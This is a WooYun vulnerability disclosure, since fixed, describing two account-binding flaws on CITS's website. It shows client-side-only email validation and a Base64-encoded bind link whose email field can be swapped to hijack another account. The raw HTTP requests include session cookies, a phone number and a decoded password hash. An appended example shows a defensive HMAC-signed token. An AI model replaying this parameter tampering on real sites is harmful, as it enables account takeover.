
Vulnerability Summary

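Bug ID: wooyun-2015-0122638

Title: Travel security: flaws at CITS affect arbitrary users (2 places)

Vendor: CITS (中国国旅)

Author: harbour_bin

Submitted: 2015-06-25 11:25

Fixed: 2015-08-09 11:40

Published: 2015-08-09 11:40

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. If you have questions or need help, contact [email protected]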



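Vulnerability Details

Disclosure status:

2015-06-25: Details reported to the vendor, awaiting vendor handling
2015-06-25: Vendor confirmed; details disclosed to the vendor only
2015-07-05: Details disclosed to core white hats and experts in related fields
2015-07-15: Details disclosed to regular white hats
2015-07-25: Details disclosed to intern white hats
2015-08-09: Details disclosed to the public

Brief description:

Travel security: flaws in the CITS personal center affect arbitrary users (2 places)
PS: There was originally one more, but its impact was hard to judge, so I did not submit it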

详细说明:

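1. Binding an email address in the personal center

[Image: 绑定邮箱.jpg]

Enter any email address

[Image: 绑定邮箱1.jpg]

[Image: QQ截图20150625092140.jpg]

Modify the value in the Email field

[Image: 绑定邮箱2.jpg]

An email can now be sent to an already registered account, which shows that validation is performed only on the client side

[Image: QQ截图20150625092446.jpg]

2. A second binding issue
Two already registered accounts

[Image: 帐号1.jpg]

[Image: 帐号2.jpg]

Send the message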
POST http://www.cits.cn/member/bind.html HTTP/1.1
Host: www.cits.cn
Proxy-Connection: keep-alive
Content-Length: 92
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.cits.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.cits.cn/member/bind.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: citsuuid=A1B8A831-5B9C-4638-B13D-EB0469A81A8E; HTjustId=35; HTjustName=%E9%A6%99%E6%B8%AF%E6%96%87%E5%8D%8E%E4%B8%9C%E6%96%B9%E9%85%92%E5%BA%97; HTjustUrl=%2Fhotel%2Fdetail%2F35.html%3Fcity_id%3D30000898; HTjustImage=http%3A%2F%2Ffile5.cits.cn%2Fhotel%2Fjielv_img%2F35%2F35_297.jpg; HTjustPrice=0; Hm_lvt_2496684fc50525da3fb986826f3d01da=1434700404; HOST_DOMAIN_USER=nj.cits.cn; JSESSIONIDB2C=g3DGVLLThv1SnT21hHwslGYJXRqjJcGNNpmmMRKYnn6p5HQ0whRf!-2025650742; HTTPSESSIONIDB2C=b6fb58886bf9c1ba2c113b29a3a8f719; CitsOnlineLoginId=17701591416; CitsOnlineLoginType=mobile; CitsOnlineLoginMode=true; CROSS_CITS_GO=g3DGVLLThv1SnT21hHwslGYJXRqjJcGNNpmmMRKYnn6p5HQ0whRf!-2025650742!1435192142230new; HOST_DOMAIN_PAGE=nj.cits.cn; Hm_lvt_e7bdd9d92a22943295c3a60a605361b3=1435148485,1435148720,1435192152,1435192262; Hm_lpvt_e7bdd9d92a22943295c3a60a605361b3=1435192758; CNZZDATA1254452230=1901146286-1431946488-http%253A%252F%252Fwww.baidu.com%252F%7C1435192109; _gscu_962565170=319519027udzfn70; _gscs_962565170=351921533scito30|pv:50; _gscbrs_962565170=1
citsTooken=dabe9168-f8fc-4e42-9585-0b62551f3ff7&email=wooyun_test%40163.com&type=SendEmalVfc


Email verification

[Image: wooyun_test.jpg]

Binding request

GET http://www.cits.cn/member/bind.html?type=bindEmail&sendTime=MjAxNS0wNi0yNSAwODo0MQ==&login_id=YzIwMDA0OTgxMDE=&password=MmQ3YTJkYTg1NjQ4NjA2ZDRlMTg5YjI1YjI2MmMzYjQ=&email=d29veXVuX3Rlc3RAMTYzLmNvbQ==&loginnametype=bW9iaWxl HTTP/1.1
Host: www.cits.cn
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://mail.163.com/js6/main.jsp?sid=eBHcsAUfaAUaInyqjQffipJFuafqRVYh&df=unireg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: citsuuid=A1B8A831-5B9C-4638-B13D-EB0469A81A8E; HTjustId=35; HTjustName=%E9%A6%99%E6%B8%AF%E6%96%87%E5%8D%8E%E4%B8%9C%E6%96%B9%E9%85%92%E5%BA%97; HTjustUrl=%2Fhotel%2Fdetail%2F35.html%3Fcity_id%3D30000898; HTjustImage=http%3A%2F%2Ffile5.cits.cn%2Fhotel%2Fjielv_img%2F35%2F35_297.jpg; HTjustPrice=0; Hm_lvt_2496684fc50525da3fb986826f3d01da=1434700404; HOST_DOMAIN_USER=nj.cits.cn; JSESSIONIDB2C=g3DGVLLThv1SnT21hHwslGYJXRqjJcGNNpmmMRKYnn6p5HQ0whRf!-2025650742; HTTPSESSIONIDB2C=b6fb58886bf9c1ba2c113b29a3a8f719; CitsOnlineLoginId=17701591416; CitsOnlineLoginType=mobile; CitsOnlineLoginMode=true; CROSS_CITS_GO=g3DGVLLThv1SnT21hHwslGYJXRqjJcGNNpmmMRKYnn6p5HQ0whRf!-2025650742!1435192142230new; HOST_DOMAIN_PAGE=nj.cits.cn; Hm_lvt_e7bdd9d92a22943295c3a60a605361b3=1435148485,1435148720,1435192152,1435192262; Hm_lpvt_e7bdd9d92a22943295c3a60a605361b3=1435192875; CNZZDATA1254452230=1901146286-1431946488-http%253A%252F%252Fwww.baidu.com%252F%7C1435192109; _gscu_962565170=319519027udzfn70; _gscs_962565170=351921533scito30|pv:51; _gscbrs_962565170=1


The parameters are Base64-encoded; decoded, they are:
sendTime=MjAxNS0wNi0yNSAwODo0MQ== -> 2015-06-25 08:41
login_id=YzIwMDA0OTgxMDE= -> c2000498101
password=MmQ3YTJkYTg1NjQ4NjA2ZDRlMTg5YjI1YjI2MmMzYjQ= -> 2d7a2da85648606d4e189b25b262c3b4 (md5) wooyun123
email=d29veXVuX3Rlc3RAMTYzLmNvbQ== -> wooyun_test@163.com
loginnametype=bW9iaWxl
After changing the email to [email protected], the result is:

[Image: burpsuit.jpg]

Finally

[Image: 1207727511.jpg]

[Image: 帐号3.jpg]

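Proof of vulnerability:

Proven!

Suggested fix:

Strengthen server-side validation!

Copyright notice: when reposting, please credit the source harbour_bin@WooYun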
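One way to apply the suggested fix to the bind-confirmation link, as an added example that is not part of the original report or the vendor's code: instead of Base64 fields the server trusts as-is, the link carries a payload protected by a server-side HMAC, with an expiry, and the account is taken from the authenticated session rather than from the URL (no login_id or password hash in the link). The function names, key, lifetime and sample values are assumptions constructed for the example.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-key"  # assumption: server-only key from a secret store
TTL_SECONDS = 1800                # assumption: confirmation link lifetime


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()


def issue_bind_token(account_id: str, email: str, now: float) -> str:
    """Value placed in the confirmation link that is mailed to `email`."""
    claims = {"acct": account_id, "email": email, "exp": int(now) + TTL_SECONDS}
    payload = json.dumps(claims, sort_keys=True).encode()
    tag = hmac.new(SECRET, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(tag)


def verify_bind_token(token: str, session_account_id: str, now: float):
    """Return the email to bind, or None if altered, expired or for another account."""
    try:
        payload_b64, tag_b64 = token.split(".")
        payload = base64.urlsafe_b64decode(payload_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError:  # wrong shape or invalid Base64
        return None
    expected = hmac.new(SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # any edit to the encoded fields invalidates the MAC
    claims = json.loads(payload)
    if now > claims["exp"] or claims["acct"] != session_account_id:
        return None  # stale link, or link issued for a different account
    return claims["email"]


def reencode_with_email(token: str, new_email: str) -> str:
    """Constructed check: swap the email field and reuse the old MAC."""
    payload_b64, tag_b64 = token.split(".")
    claims = json.loads(base64.urlsafe_b64decode(payload_b64))
    claims["email"] = new_email
    return _b64(json.dumps(claims, sort_keys=True).encode()) + "." + tag_b64


if __name__ == "__main__":
    t = issue_bind_token("acct-1001", "alice@example.com", 1_700_000_000)
    print(verify_bind_token(t, "acct-1001", 1_700_000_060))
    print(verify_bind_token(reencode_with_email(t, "other@example.com"), "acct-1001", 1_700_000_060))
```

The token is stateless, so making a link single-use additionally needs a server-side record of consumed tokens.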


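Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-06-25 11:39

Vendor reply:

Thank you very much for your report. The issue has been handled. Thank you very much for your support of CITS (中国国旅).

Latest status:

None yet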